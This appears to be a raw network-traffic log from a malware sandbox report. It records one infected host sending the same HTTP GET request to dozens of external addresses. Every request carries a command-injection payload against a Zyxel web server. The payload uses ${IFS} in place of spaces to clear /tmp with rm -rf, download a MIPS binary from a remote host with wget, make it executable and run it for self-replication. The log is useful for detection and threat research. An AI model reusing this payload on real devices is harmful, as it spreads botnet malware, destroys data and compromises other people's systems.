                              Mar 31, 2024 08:41:26.851080894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4471192.168.2.135908096.101.148.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851161003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4472192.168.2.1351622191.120.76.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851233006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4473192.168.2.1340412190.175.160.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851293087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4474192.168.2.13459704.243.111.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851361036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4475192.168.2.135474860.58.133.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851408958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4476192.168.2.135928867.68.228.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851444006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4477192.168.2.135584041.191.173.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851526022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4478192.168.2.1344284209.117.193.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851562977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4479192.168.2.133574079.243.162.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851624012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4480192.168.2.1359552122.198.166.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851694107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4481192.168.2.1337562156.157.165.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851752996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4482192.168.2.135231213.185.114.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851803064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4483192.168.2.1352390158.205.212.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851874113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4484192.168.2.1351890219.50.79.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851914883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4485192.168.2.1341340134.22.243.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.851978064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4486192.168.2.133578035.103.29.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852040052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4487192.168.2.133323037.25.160.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852107048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4488192.168.2.134222435.25.104.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852181911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4489192.168.2.134095472.128.100.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852252960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4490192.168.2.134672291.1.15.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852319956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4491192.168.2.1340448139.47.57.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852387905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4492192.168.2.135672664.242.9.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852437973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4493192.168.2.1339698200.222.98.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852529049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4494192.168.2.133489463.154.44.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852586985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4495192.168.2.1348000113.32.26.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852654934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4496192.168.2.1349396106.72.138.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852685928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4497192.168.2.1333098156.194.175.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852741003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4498192.168.2.1355130211.140.147.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852797031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4499192.168.2.134931079.202.38.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852858067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4500192.168.2.1336212145.168.12.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852895021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4501192.168.2.134972096.228.193.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.852968931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4502192.168.2.1350246109.69.188.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853001118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4503192.168.2.135972899.16.239.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853072882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4504192.168.2.1341114219.32.122.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853118896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4505192.168.2.1348794175.28.97.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853157997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4506192.168.2.133555242.221.26.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853220940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4507192.168.2.1343024180.16.250.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853261948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4508192.168.2.1359086126.23.232.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853343010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4509192.168.2.1357030213.23.94.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853382111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4510192.168.2.1351012222.175.149.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853451014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4511192.168.2.1349442112.90.87.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853493929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4512192.168.2.134405869.45.147.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853557110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4513192.168.2.134607484.127.102.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853627920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4514192.168.2.135896061.228.26.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853678942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4515192.168.2.135120287.144.8.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853750944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4516192.168.2.13606869.114.11.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853801966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4517192.168.2.1347492207.152.23.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853846073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4518192.168.2.1357346181.169.219.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853908062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4519192.168.2.1347890116.31.171.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.853945971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4520192.168.2.135200673.139.97.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854027033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4521192.168.2.1352622152.39.127.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854089022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4522192.168.2.1344878139.92.50.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854139090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4523192.168.2.1347686173.70.53.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854209900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4524192.168.2.1355934156.26.57.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854284048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4525192.168.2.1357758189.113.84.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854342937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4526192.168.2.1353514209.104.226.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854371071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4527192.168.2.1352236144.147.28.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854468107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4528192.168.2.1335790165.178.31.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854535103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4529192.168.2.1346712210.149.158.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854584932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4530192.168.2.1335654169.227.94.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854624033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4531192.168.2.1333946203.115.101.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854716063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4532192.168.2.134204277.23.198.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854799032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4533192.168.2.1344258177.208.50.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854845047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4534192.168.2.1343754199.50.19.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854882956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4535192.168.2.1346912155.116.174.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.854983091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4536192.168.2.134014458.79.123.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.855029106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4537192.168.2.134552885.172.214.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.855087042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4538192.168.2.1345050107.91.37.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.855176926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4539192.168.2.13605121.169.63.218443
                              TimestampBytes transferredDirectionData
